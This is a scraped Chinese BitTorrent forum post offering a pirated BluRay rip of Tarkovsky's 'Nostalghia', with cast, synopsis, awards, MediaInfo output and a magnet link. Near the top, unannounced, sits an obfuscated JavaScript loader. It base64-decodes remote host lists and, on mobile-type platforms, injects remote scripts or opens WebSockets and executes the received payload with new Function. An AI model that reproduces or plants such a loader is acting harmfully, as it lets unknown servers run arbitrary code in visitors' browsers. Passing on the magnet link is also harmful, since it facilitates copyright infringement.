乡愁[中文字幕]Nostalghia.1983.1080p.BluRay.x264.DTS-迅雷下载 11.73GB

版主小s 2月前 208

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 乡愁 / 怀乡 / Nostalghia / Nostalgia
◎片  名 Ностальгия
◎年  代 1983
◎产  地 苏联 / 意大利
◎类  别 剧情
◎语  言 意大利语 / 俄语
◎上映日期 1983-05-17(戛纳电影节)
◎IMDb链接 https://www.imdb.com/title/tt0086022/
◎豆瓣评分 9.1/10 (26331人评价)
◎豆瓣链接 https://movie.douban.com/subject/1291556/
◎片  长 125分钟
◎导  演 安德烈·塔可夫斯基 Andrei Tarkovsky (id:1027778)
◎编  剧 安德烈·塔可夫斯基 Andrei Tarkovsky (id:1027778)
       托尼诺·格拉 Tonino Guerra (id:1032838)
◎演  员 奥列格·扬科夫斯基 Oleg Yankovskiy (id:1164146)
       厄兰·约瑟夫森 Erland Josephson (id:1019223)
       多美兹亚娜·佐丹奴 Domiziana Giordano (id:1050571)
       帕特里齐娅·特雷诺 Patrizia Terreno (id:1344141)
       劳拉·德·马奇 Laura De Marchi (id:1317514)
       德丽娅·布卡尔铎 Delia Boccardo (id:1065050)
       米莱娜·伍柯迪克 Milena Vukotic (id:1161854)
       Raffaele Di Mario Raffaele Di Mario (id:1087979)
       Rate Furlan Rate Furlan (id:1035910)
       Piero Vida Piero Vida (id:1151756)
       Amedeo Salfa Amedeo Salfa (id:1296521)
       丽娜·纳丽·塔维尼 Lina Nerli Taviani (id:1293050)

◎标  签 塔可夫斯基 / 苏联 / 俄罗斯 / 安德烈·塔可夫斯基 / 文艺 / 意大利 / AndreiTarkovsky / 电影

◎简  介
  俄国诗人安德烈(奥列格·扬科夫斯基 Oleg Yankovsky 饰)在美丽的女翻译尤金伲亚(多美兹亚娜·佐丹奴 Domiziana Giordano 饰)的陪同下,一同前往意大利寻访一位十八世纪俄国作曲家的生活。他们一起走访充满宗教意象的乡村教堂,在一座有天然温泉的古老小镇停留。 此时他遇见了不被世人理解的疯人多米尼克(厄兰·约瑟夫森 Erland Josephson 饰),村民因为他早些年囚禁家人而认为他神经失常。可安德烈看到了多米尼克疯狂下的深意,并被他所吸引。同时他拒绝了性感的尤金伲亚的示爱。此时的安德烈,游走在支离破碎的现实与超现实的梦境中不能自拔。他对祖国的思念、与家人的分离……种种情愫混杂在一起,彼此纠缠,化为终生的乡愁。                                    
                                本片获1983年戛纳电影节最佳导演奖,普通评审团奖,国际影评人费比西奖。

◎获奖情况 (共4项)
  第36届戛纳电影节 (1983)
  主竞赛单元 金棕榈奖(提名)
   └──安德烈·塔可夫斯基 (id:1027778)
  主竞赛单元 最佳导演
   └──安德烈·塔可夫斯基 (id:1027778)
  费比西奖
   └──安德烈·塔可夫斯基 (id:1027778)
  天主教人道精神奖
   └──安德烈·塔可夫斯基 (id:1027778)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 51694792854432863757207730301334899509 (0x26E40E1161BBA77CFBC23712DC3ACB35)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 11.7 GiB
  8. Duration                                 : 2 h 5 min
  9. Overall bit rate                         : 13.4 Mb/s
  10. Movie name                               : NOSTALGHIA
  11. Encoded date                             : UTC 2021-07-25 13:11:07
  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : AVC
  19. Format/Info                              : Advanced Video Codec
  20. Format profile                           : [email protected]
  21. Format settings                          : CABAC / 4 Ref Frames
  22. Format settings, CABAC                   : Yes
  23. Format settings, Reference frames        : 4 frames
  24. Codec ID                                 : V_MPEG4/ISO/AVC
  25. Duration                                 : 2 h 5 min
  26. Bit rate                                 : 11.8 Mb/s
  27. Width                                    : 1 720 pixels
  28. Height                                   : 1 036 pixels
  29. Display aspect ratio                     : 5:3
  30. Frame rate mode                          : Constant
  31. Frame rate                               : 24.000 FPS
  32. Color space                              : YUV
  33. Chroma subsampling                       : 4:2:0
  34. Bit depth                                : 8 bits
  35. Scan type                                : Progressive
  36. Bits/(Pixel*Frame)                       : 0.277
  37. Stream size                              : 10.4 GiB (89%)
  38. Writing library                          : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]
  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=19.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Audio
  43. ID                                       : 2
  44. ID in the original source medium         : 4352 (0x1100)
  45. Format                                   : DTS
  46. Format/Info                              : Digital Theater Systems
  47. Codec ID                                 : A_DTS
  48. Duration                                 : 2 h 5 min
  49. Bit rate mode                            : Constant
  50. Bit rate                                 : 1 509 kb/s
  51. Channel(s)                               : 2 channels
  52. Channel layout                           : L R
  53. Sampling rate                            : 48.0 kHz
  54. Frame rate                               : 93.750 FPS (512 SPF)
  55. Bit depth                                : 24 bits
  56. Compression mode                         : Lossy
  57. Stream size                              : 1.33 GiB (11%)
  58. Language                                 : Italian
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Original source medium                   : Blu-ray
  62. Text #1
  63. ID                                       : 3
  64. ID in the original source medium         : 4609 (0x1201)
  65. Format                                   : PGS
  66. Muxing mode                              : zlib
  67. Codec ID                                 : S_HDMV/PGS
  68. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  69. Duration                                 : 2 h 4 min
  70. Bit rate                                 : 8 379 b/s
  71. Count of elements                        : 794
  72. Stream size                              : 7.49 MiB (0%)
  73. Title                                    : chs
  74. Language                                 : Chinese
  75. Default                                  : Yes
  76. Forced                                   : No
  77. Original source medium                   : Blu-ray
  78. Text #2
  79. ID                                       : 4
  80. ID in the original source medium         : 4610 (0x1202)
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 2 h 4 min
  86. Bit rate                                 : 8 492 b/s
  87. Count of elements                        : 794
  88. Stream size                              : 7.59 MiB (0%)
  89. Title                                    : cht
  90. Language                                 : Chinese
  91. Default                                  : No
  92. Forced                                   : No
  93. Original source medium                   : Blu-ray
  94. Text #3
  95. ID                                       : 5
  96. ID in the original source medium         : 4611 (0x1203)
  97. Format                                   : PGS
  98. Muxing mode                              : zlib
  99. Codec ID                                 : S_HDMV/PGS
  100. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  101. Duration                                 : 2 h 1 min
  102. Bit rate                                 : 14.4 kb/s
  103. Count of elements                        : 1223
  104. Stream size                              : 12.5 MiB (0%)
  105. Title                                    : rus
  106. Language                                 : Russian
  107. Default                                  : No
  108. Forced                                   : No
  109. Original source medium                   : Blu-ray
  110. Menu
  111. 00:00:00.000                             : Chapter 01
  112. 00:02:55.958                             : Chapter 02
  113. 00:12:50.125                             : Chapter 03
  114. 00:32:32.250                             : Chapter 04
  115. 00:46:49.666                             : Chapter 05
  116. 01:06:10.500                             : Chapter 06
  117. 01:21:03.416                             : Chapter 07
  118. 01:29:45.666                             : Chapter 08
  119. 01:34:57.208                             : Chapter 09
  120. 01:45:43.333                             : Chapter 10
  121. 01:53:12.958                             : Chapter 11
  122. 02:02:45.750                             : Chapter 12


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:7D0A561FD77546A706BB01748D55673C426CB6EF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回